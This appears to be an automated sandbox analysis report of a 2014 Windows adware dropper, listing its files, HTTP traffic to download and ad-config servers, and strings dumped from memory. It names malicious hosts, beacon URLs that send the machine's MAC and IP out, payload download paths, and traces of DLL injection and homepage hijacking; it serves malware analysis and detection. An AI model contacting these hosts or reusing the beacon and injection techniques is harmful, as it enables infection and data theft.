.fyf | 245760 | 24576 | 24576 | 1.2573 | 99258b4abbf40d5dd4b49639f1d3e8ea |
.fyf | 270336 | 139264 | 139264 | 5.508 | 2b1cc40328f8cdd81d81a5fcc4a97692 |
.FYFa | 409600 | 393216 | 393216 | 5.1687 | 518f5b687ef25cd9efa4eb3b02d16991 |
Network Activity
URLs
URL | IP |
---|---|
hxxp://www.iojjek.com/down/20140504201222.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 | 118.145.16.38 |
hxxp://www.iojjek.com/down/20140403140535.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 | 118.145.16.38 |
hxxp://www.iojjek.com/down/20140404174727.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 | 118.145.16.38 |
hxxp://www.iojjek.com/down/20131127183156.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 | 118.145.16.38 |
hxxp://a1.p2ptool.com/txt/qtool.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=00533A1092B84F73B9CCC1AD91064DF3 | 42.159.80.192 |
hxxp://download.cpudln.com/12/ad22161.exe?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 | 174.37.172.71 |
hxxp://a1.p2ptool.com/txt/shock.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=83CAF3E7E328C4F1B414B0565546DA23 | 42.159.80.192 |
hxxp://www.iojjek.com/down/20140403140503.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 | 118.145.16.38 |
hxxp://a1.p2ptool.com/txt/MiniIE.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=0CF4F544011329985BA796AD74A77901 | 42.159.80.192 |
hxxp://a1.p2ptool.com/txt/minie.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=BABC6CF351B7B2C4C859C12DFBD39277 | 42.159.80.192 |
hxxp://a1.p2ptool.com/txt/First.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=5D8AFFE78CF6342F0127A967DE092E0A | 42.159.80.192 |
hxxp://a1.p2ptool.com/txt/whitelist.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94 | 42.159.80.192 |
hxxp://1st.ecoma.glb0.lxdns.com/client/config.ini | |
hxxp://1st.ecoma.glb0.lxdns.com/attachments/advert/201405/20140505190815.ico | |
hxxp://download006.rdb.cnc.ccgslb.com.cn/getconfig/minisite.ini | |
hxxp://1st.ecoma.glb0.lxdns.com/attachments/advert/201405/20140505190854.ico | |
hxxp://1st.ecoma.glb0.lxdns.com/sh/index.html | |
hxxp://tt.woai310.com/client/config.ini | 209.170.78.73 |
hxxp://site.minimenhu.com/sh/index.html | 209.170.78.73 |
hxxp://get.woai310.com/getconfig/minisite.ini | 221.194.130.5 |
hxxp://icon.woai310.com/attachments/advert/201405/20140505190854.ico | 209.170.78.77 |
hxxp://icon.woai310.com/client/config.ini | 209.170.78.77 |
hxxp://icon.woai310.com/attachments/advert/201405/20140505190815.ico | 209.170.78.77 |
ad.zzinfor.cn |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /client/config.ini HTTP/1.0
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: icon.woai310.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 05 May 2014 13:29:59 GMT
Server: Apache
Last-Modified: Mon, 05 May 2014 11:09:53 GMT
ETag: "3f82de-167-4f8a52baea240"
Accept-Ranges: bytes
Content-Length: 359
Content-Type: text/plain
X-Via: 1.1 fra72:5 (Cdn Cache Server V2.0)
Connection: close
[AD192]..id=192..url=hXXp://p.ucwan87.net/s/1/1222/19865.html?uid=905030..reg=..name=................ico=hXXp://icon.woai310.com/attachments/advert/201405/20140505190815.ico..[AD193]..id=193..url=hXXp://youxi.baidu.com/yxpm/pm.jsp?pid=101110070500236_2838257..reg=..name=..........ico=hXXp://icon.woai310.com/attachments/advert/201405/20140505190854.ico..
GET /sh/index.html HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: site.minimenhu.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 May 2014 13:30:06 GMT
Server: nginx/1.4.4
Content-Type: text/html
Last-Modified: Mon, 05 May 2014 09:34:12 GMT
Transfer-Encoding: chunked
Content-Encoding: gzip
X-Via: 1.1 fra73:6 (Cdn Cache Server V2.0)
Connection: keep-alive
<<< skipped >>>
GET /client/config.ini HTTP/1.0
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: tt.woai310.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 05 May 2014 13:19:47 GMT
Server: Apache
Last-Modified: Mon, 05 May 2014 10:47:43 GMT
ETag: "3d8761-19e-4f8a4dc6871c0"
Accept-Ranges: bytes
Content-Length: 414
Content-Type: text/plain
Age: 1
X-Via: 1.1 fra72:5 (Cdn Cache Server V2.0)
Connection: close
[u]..[AD452]..id=452..url=hXXp://t.xydhl.com/?eid=638aiOt+ay+fG8cY0iRI3L+Pk3hy82KNMBAbzJRGCYPG..reg=..[AD454]..id=454..url=hXXp://nbtg3.youyou234.com/?uid=913189..reg=..[AD455]..id=455..url=hXXp://VVV.mygame66.com/213700004.html..reg=..[AD458]..id=458..url=hXXp://num9998.7lianmeng.net/ ..reg=..[u]..name=705679..[AD282]..id=282..url=hXXp://tg.dhelper001.com/goto/jump.php?source=158&aid=40..reg=..
GET /down/20140403140535.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.iojjek.com
Connection: Keep-Alive
nConnection: Close
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Mon, 05 May 2014 13:26:41 GMT
Content-Type: application/octet-stream
Content-Length: 128924
Last-Modified: Thu, 03 Apr 2014 06:05:35 GMT
Connection: keep-alive
ETag: "533cfa2f-1f79c"
Accept-Ranges: bytes
<<< skipped >>>
GET /attachments/advert/201405/20140505190854.ico HTTP/1.0
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: icon.woai310.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 05 May 2014 13:30:03 GMT
Server: Apache
Last-Modified: Mon, 05 May 2014 11:08:54 GMT
ETag: "28d800a-25be-4f8a5282a5d80"
Accept-Ranges: bytes
Content-Length: 9662
Content-Type: image/x-icon
X-Via: 1.1 fra72:3 (Cdn Cache Server V2.0)
Connection: close
<<< skipped >>>
GET /txt/First.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=5D8AFFE78CF6342F0127A967DE092E0A HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: a1.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Mon, 05 May 2014 13:30:18 GMT
Content-Type: text/plain
Content-Length: 55992
Last-Modified: Thu, 31 Oct 2013 07:46:57 GMT
Connection: close
ETag: "52720af1-dab8"
Accept-Ranges: bytes
<<< skipped >>>
GET /down/20140403140503.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.iojjek.com
Connection: Keep-Alive
nConnection: Close
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Mon, 05 May 2014 13:26:41 GMT
Content-Type: application/octet-stream
Content-Length: 146489
Last-Modified: Thu, 03 Apr 2014 06:05:04 GMT
Connection: keep-alive
ETag: "533cfa10-23c39"
Accept-Ranges: bytes
<<< skipped >>>
GET /down/20140504201222.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.iojjek.com
Connection: Keep-Alive
nConnection: Close
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Mon, 05 May 2014 13:26:41 GMT
Content-Type: application/octet-stream
Content-Length: 762046
Last-Modified: Sun, 04 May 2014 12:12:23 GMT
Connection: keep-alive
ETag: "53662ea7-ba0be"
Accept-Ranges: bytes
<<< skipped >>>
GET /txt/minie.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=BABC6CF351B7B2C4C859C12DFBD39277 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: a1.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Mon, 05 May 2014 13:30:17 GMT
Content-Type: text/plain
Content-Length: 552288
Last-Modified: Thu, 17 Apr 2014 07:17:37 GMT
Connection: close
ETag: "534f8011-86d60"
Accept-Ranges: bytes
<<< skipped >>>
GET /txt/qtool.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=00533A1092B84F73B9CCC1AD91064DF3 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: a1.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Mon, 05 May 2014 13:30:16 GMT
Content-Type: text/plain
Content-Length: 207544
Last-Modified: Fri, 14 Mar 2014 03:05:39 GMT
Connection: close
ETag: "53227203-32ab8"
Accept-Ranges: bytes
<<< skipped >>>
GET /txt/MiniIE.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=0CF4F544011329985BA796AD74A77901 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: a1.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Mon, 05 May 2014 13:30:16 GMT
Content-Type: text/plain
Content-Length: 362944
Last-Modified: Wed, 23 Oct 2013 18:15:53 GMT
Connection: close
ETag: "52681259-589c0"
Accept-Ranges: bytes
<<< skipped >>>
GET /12/ad22161.exe?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: download.cpudln.com
Connection: Keep-Alive
nConnection: Close
HTTP/1.1 404 Not Found
Date: Mon, 05 May 2014 13:29:53 GMT
Server: Apache
X-Powered-By: PHP/5.5.8
X-Frame-Options: Deny
Content-Length: 1361
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8">. <style type="text/css">. html, body, #partner, iframe {. height:100%;. width:100%;. margin:0;. padding:0;. border:0;. outline:0;. font-size:100%;. vertical-align:baseline;. background:transparent;. }. body {. overflow:hidden;. }. </style>. <meta content="NOW" name="expires">. <meta content="index, follow, all" name="GOOGLEBOT">. <meta content="index, follow, all" name="robots">. <!-- Following Meta-Tag fixes scaling-issues on mobile devices -->. <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport">. </head>. <body>. <div id="partner"></div>. <script type="text/javascript">. document.write(. '<script type="text/javascript" language="JavaScript"'. 'src="//sedoparking.com/frmpark/'. window.location.host '/'. 'sedonewreg'. '/park.js">'. '<\/script>'. );. </script>. </body>.</html>...
<<< skipped >>>
GET /getconfig/minisite.ini HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: get.woai310.com
Connection: Keep-Alive
HTTP/1.0 200 OK
Content-Length: 66
Content-Type: application/octet-stream
Last-Modified: Fri, 02 May 2014 10:25:14 GMT
Accept-Ranges: bytes
ETag: "30877cef065cf1:78e6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 May 2014 10:26:05 GMT
Expires: Tue, 06 May 2014 10:26:05 GMT
Powered-By-ChinaCache: HIT from CNC-YT-3-3OR.3
Age: 11035
Powered-By-ChinaCache: HIT from CNC-YJ-2-3kA
Connection: keep-alive
[cfg]..url=hXXp://site.minimenhu.com/sh/index.html..rate=100/100....
GET /attachments/advert/201405/20140505190815.ico HTTP/1.0
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: icon.woai310.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 05 May 2014 13:30:00 GMT
Server: Apache
Last-Modified: Mon, 05 May 2014 11:08:15 GMT
ETag: "10016f-25be-4f8a525d745c0"
Accept-Ranges: bytes
Content-Length: 9662
Content-Type: image/x-icon
X-Via: 1.1 fra73:0 (Cdn Cache Server V2.0)
Connection: close
<<< skipped >>>
GET /txt/whitelist.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: a1.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Mon, 05 May 2014 13:30:20 GMT
Content-Type: text/plain
Content-Length: 3476
Last-Modified: Fri, 22 Nov 2013 08:41:51 GMT
Connection: close
ETag: "528f18cf-d94"
Accept-Ranges: bytes
<<< skipped >>>
GET /down/20131127183156.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.iojjek.com
Connection: Keep-Alive
nConnection: Close
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Mon, 05 May 2014 13:26:41 GMT
Content-Type: application/octet-stream
Content-Length: 50556
Last-Modified: Wed, 27 Nov 2013 10:31:57 GMT
Connection: keep-alive
ETag: "5295ca1d-c57c"
Accept-Ranges: bytes
<<< skipped >>>
GET /txt/shock.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=83CAF3E7E328C4F1B414B0565546DA23 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: a1.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Mon, 05 May 2014 13:30:16 GMT
Content-Type: text/plain
Content-Length: 148828
Last-Modified: Thu, 17 Apr 2014 07:55:19 GMT
Connection: close
ETag: "534f88e7-2455c"
Accept-Ranges: bytes
<<< skipped >>>
GET /down/20140404174727.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.iojjek.com
Connection: Keep-Alive
nConnection: Close
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Mon, 05 May 2014 13:26:41 GMT
Content-Type: application/octet-stream
Content-Length: 52808
Last-Modified: Fri, 04 Apr 2014 09:47:27 GMT
Connection: keep-alive
ETag: "533e7faf-ce48"
Accept-Ranges: bytes
<<< skipped >>>
Strings from Dumps
%original file name%.exe_1040:
.text
`.rdata
@.data
.rsrc
@.fyf
<.SSWh
KERNEL32.dll
USER32.dll
ShellExecuteA
SHELL32.dll
_acmdln
MSVCRT.dll
EXE_temp%x%s
EXE_temp0.exe
EXE_temp1.EXE
EXE_temp2.exe
EXE_temp3.exe
EXE_temp4.EXE
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp4.EXE
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
"%"""&"""!!""
.Fj)V
DO*.tnCU
$%c&#'(
j.CjI
%DQ80*f.b
*3x<%Sc
b;.Nj
?456789:;<=
!"#$%&'()* ,-./
0,1'8"5.*2$
\\.\SSDT
@~MSVCRT3
5A937EE-621D-4F66-8C
fit.exhGET
ngKbytes=%d-
%s\Cxnec
Sw -gU|u.Cj{{
d2
g7http:/
fi.Pz`
msvcrt>
}w%dk8V/
zcÁ
j.rPS\
E:\CODE_P~1\p2
9|!3<3[3
D:\Te
%FinA
KERNEL32.DLL
ADVAPI32.dll
iphlpapi.dll
SHLWAPI.dll
WININET.dll
WS2_32.dll
RegFlushKey
InternetCrackUrlA
.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
u%CNu
TOnAskForKey
OnAskForKeyT
Visit http://www.abyssmedia.com for more info.
cmd.exe /c
command.com /c
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
GetWindowsDirectoryA
GetCPInfo
: :$:(:,:0:4:8:
-,.4031652,
*)$#"&&%
KWindows
UrlMon
`.data
MSVBVM60.DLL
vb6chs.dll
D:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
VBA6.DLL
L.iNz
z[^.ZW1
1u.xJ
E/%sT
-.nF*4
-i7u}
H8 %u,O[
b.Yy]
"m.ZGI(
>%uK1>
v-|%s\u
$L.QWF7
@q.kv
.lh3i
.gBk_
_%8xE)
:.dA qz
~gzK%s
]%UYa
0[<hsT-y>
i%x^K
&0.IR
V.eeW
kGd%S
X*.QdL
i.zOoz
Z%XHt
1, 0, 3, 916
0, 0, 0, 0
%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s$''%s'' is not a valid component name
Invalid property value List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
%s.Seek not implemented$Operation not allowed on sorted list
Property %s does not exist
Ancestor for '%s' not found
Cannot assign a %s to a %s
Class %s not found%List does not allow duplicates ($0%x)#A component named %s already exists
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation
1. 1. 1. 1
0.0.0.0
"%Program Files%\Internet Explorer\IEXPLORE.EXE" -nohome
WScript.Shell
HKEY_CLASSES_ROOT\http\shell\open\command\
- http://guangnen123.com/
1.00.0001
reg.exe
EXE_temp2.exe_1176:
.text
`.data
.rsrc
MSVBVM60.DLL
vb6chs.dll
D:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
VBA6.DLL
"%Program Files%\Internet Explorer\IEXPLORE.EXE" -nohome
WScript.Shell
HKEY_CLASSES_ROOT\http\shell\open\command\
- http://guangnen123.com/
1.00.0001
reg.exe
EXE_temp3.exe_816:
__MSVCRT_HEAP_SELECT
user32.dll
USER32.dll
58lm/temptation.bin
.IUQT
[.aoH
[8~%xs
 .oN7
z.Tl&
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp3.exe
GetProcessHeap
GetCPInfo
.text
`.rdata
@.data
KERNEL32.DLL
EXE_temp3.exe_816_rwx_00350000_0005A000:
SSSSh
__MSVCRT_HEAP_SELECT
user32.dll
inflate 1.2.3 Copyright 1995-2005 Mark Adler
ERSION.dll
WINDOWS
Find In FileLib, API[%s]
Find In MemLib, API[%s]
API[%s]
Jmp Address: X
API[%s] CodeSize:%d
%s%s%s
:%d: %s
DNS %s->%d.%d.%d.%d
118.145.16.39
www.iiewl.com
118.145.16.38
www.iojjek.com
host:X
127.0.0.1
208.67.222.222
208.67.220.220
114.114.114.114
114.114.115.115
8.8.8.8
8.8.1.1
8.8.4.4
xid:X
sizeof(DNS_QUERY):%d
DNS IP : %d.%d.%d.%d
CNAME : %s
Length : %d
LiveTime : %d
Class : %d
Type : %d
Domain:%s
AdditionalCount:%d
NameServerCount:%d
AnswerCount :%d
QuestionCount :%d
rcode:%d
recvfrom ret:%d
sendto ret:%d
dns_query() Use Dns Server: %s
dns_query() iServer:%d
Shell.Dusn
data_len:%d body_len:%d lphdr->len:%d
Tcp Client Get Config Thread Proc.
downtime:M-d-d d:d:d
%a, %d %b %Y %H:%M:%S
get_hostent(%s,X)
1.2.3
chunk exit, chunk.length:%d chunk_size:%d chunk_size_len:%d
, nCopy:%d
Gzip Unpack, hFile:X
recv_over break_mode:%d recv_len/cont_len:%d/%d body_len/file_len:%d/%d down_ok:%d
%s%sX%s
file_len:%d cont_len:%d header_end_len:%d
, size:%d
conn.s:X
lpHost:%s
, errno:%d
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
bytes=%d-%d
bytes=%d-
HTTP/
HTTP/
, ini->ngroup=%d
i:%d len:%d ini->nline:%d
scan_ini ini->ngroup:%d
NtFunID:%4X dwKiFastSystemCall:X
dwKiFastSystemCall:X
ntdll.dll
ZwQueryValueKey
ZwOpenKey
InjectDll type:%u count:%u %s
g_ipcount:%d
ptable->dwNumEntries:%d
%s->Characteristics:X %d AdapterName:%s
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}
ip:%s
idx:%d Type:%d %s %s
localhost:%d.%d.%d.%d
%-8s: %d
%-8s: %d.%d.%d.%d
%-8s: X-X-X-X-X-X
index:%d mac_str:%s
xxxxxx
ITA %s->%s
, cmp=%d
kvs.size=%d
lpBaseAddress:x dwReadLen:%d
FileSize:%d
M-d-d d:d:d
%SystemRoot%\System32\mswsock.dll
Tcpip
SupportedNameSpace
%SystemRoot%\System32\winrnr.dll
%SystemRoot%\system32\mswsock.dll
%SystemRoot%\system32\rsvpsp.dll
|%SystemRoot%\system32\rsvpsp.dll
000000000011
000000000010
000000000009
000000000008
000000000007
000000000006
000000000005
000000000004
000000000003
000000000002
000000000001
mswsock.dll
uncompress res:%d des_len:%d
uncompress x:X src_len:%d des_len:%d
uncompress crc:X X
User:%s
GetModuleFileNameW:X
GetModuleFileNameA:X
GetModuleHandleW:X
GetModuleHandleA:X
InitResult:%d
MemLoad szAppModule:%s
pDllMain:X
pMemoryAddress:X
BaseAddress pMemoryAddress:X
CalcTotalImageSize= %d
Not Found Dll: %s
%s ModuleHandle:X
Name:X FirstThunk:X OriginalFirstThunk:X
Frist Import Table:X
No Import Table
GetExeModule:%s
GetExeModule
0.pool.ntp.org
1.pool.ntp.org
2.pool.ntp.org
3.pool.ntp.org
0.gentoo.pool.ntp.org
1.gentoo.pool.ntp.org
2.gentoo.pool.ntp.org
3.gentoo.pool.ntp.org
0.asia.pool.ntp.org
1.asia.pool.ntp.org
2.asia.pool.ntp.org
3.asia.pool.ntp.org
17.82.253.7
203.117.180.36
time.asia.apple.com
64.236.96.53
130.149.17.21
clock.via.net
ntp.nasa.gov
time-a.nist.gov
stdtime.gov.hk
time.buptnet.edu.cn
ntp.rhrk.uni-kl.de
ntp.ipv6.uni-leipzig.de
129.7.1.66
ntp.sjtu.edu.cn
202.120.2.101
time-a.timefreq.bldrdoc.gov
time-b.timefreq.bldrdoc.gov
time-c.timefreq.bldrdoc.gov
utcnist.colorado.edu
d-d-d d:d:d
i:%d [%s] n_errno:%d
Ntp iStart:%d
http://www.iojjek.com/
http://www.iiewl.com/
SendMsg uMsg:%d dwResult:%d,
DownloadUriFromServer url:%s
%d.%d.%d
%d.%d.%d.%d
, bRet:%d
buff.is_down_ok:%d response->code:%d
, ret=%d buffer.body_Len=%d is_down_ok:%d can_break_points_transfer:%d
http://
Muxtex[%d]
%s, m_down_from_server:%d
buffer.length:%d
****:%s
[%d.%d.%d.%d:%d]
(%d):%s
, length:%d
szBackPath:%s
.ELOG
Bind Port:%d
ATL:X
RegQueryValueExA %s
User32.dll
RegOpenKeyExA
ADVAPI32.dll
RegOpenKeyExW
kernel32.dll
MY_RegOpenKeyExA:%s
\ext\settings\{11f09afe-75ad-4e52-ab43-e09e9351ce17}
RegOpenKeyExA:%s
software\policies\microsoft\windows nt\dnsclient
RegisterWindowMessageA:%s
<pre>NtCreateProcessEx 
hPrcess:X</pre><pre>NtCreateProcessEx dwParentPid:%d</pre><pre>NtCreateProcessEx ProcessHandle:X ParentProcess:X</pre><pre>dwParentPid:%d</pre><pre>Module:%s</pre><pre>dwRtlUserThreadStart:X</pre><pre>SysVersion:%d.%d.%d</pre><pre>ole32.dll</pre><pre>LoadPE(ole32.dll)</pre><pre>ole32.dll</pre><pre>dnsapi.dll</pre><pre>LoadPE(dnsapi.dll)</pre><pre>dnsapi.dll</pre><pre>wininet.dll</pre><pre>LoadPE(wininet.dll)</pre><pre>HttpAddRequestHeadersW</pre><pre>HttpAddRequestHeadersA</pre><pre>HttpOpenRequestW</pre><pre>HttpOpenRequestA</pre><pre>wininet.dll</pre><pre>ws2_32.dll</pre><pre>LoadPE(ws2_32.dll)</pre><pre>ws2_32.dll</pre><pre>ntdll.dll</pre><pre>LoadPE(ntdll.dll)</pre><pre>IP:%s,Mac:X-X-X-X-X-X</pre><pre>SendTo NtDeviceIoControlFile Status:X</pre><pre>Status:X</pre><pre>Call NtDeviceIoControlFile, X</pre><pre>RecvFrom NtDeviceIoControlFile Status:X</pre><pre>%m/%d/%y</pre><pre>%H:%M:%S</pre><pre>%I:%M:%S %p</pre><pre>%x %X</pre><pre>Send File:%s</pre><pre>Open File:%s</pre><pre>send_count:%d</pre><pre>Tcp Accept Thread Exit.</pre><pre>:recv_len=%d</pre><pre>Tcp Accept Thread Proc</pre><pre>recv_len:%d</pre><pre>Tcp Accept Thread Start.</pre><pre>diff:%d timeout:%d</pre><pre>AddPeer cid:X TimeOut:%d IsTimeOut:%d</pre><pre>cid:X</pre><pre>~CUdpPeer()</pre><pre>, type:%d size:%d %d crc:X X ver:%d %d</pre><pre>Send SendRecvOK phdr->id:X phdr->type:%d</pre><pre>send_broadcast 0xFFFFFFFF ret:%d</pre><pre>send_broadcast ret:%d</pre><pre>TCP_PORT</pre><pre>UDP_PORT</pre><pre>TCP_PROTO_VER</pre><pre>UDP_PROTO_VER</pre><pre>RandBind port:%d</pre><pre>SetLockTimer index:%d uElapse:%d</pre><pre>Lock index:%d Hash:X Tick:%I64d OldStatus:%d</pre><pre>Keep m_TaskMutex[%d].Name=X</pre><pre>SendKeepPacket index:%d</pre><pre>re send id:X nSend:%d ret:%d to:%d.%d.%d.%d:%d</pre><pre>m_TaskMutex[%d]->res_list.count:%d</pre><pre>OnLockTimeOut m_TaskMutex[%d].Name=X Status:%d lock_perr[%d.%d.%d.%d:%d]</pre><pre>OnKeepTimeOut(%d) nKeepTimeOut:%d</pre><pre>OnRecvOK m_send_list.items:%d 
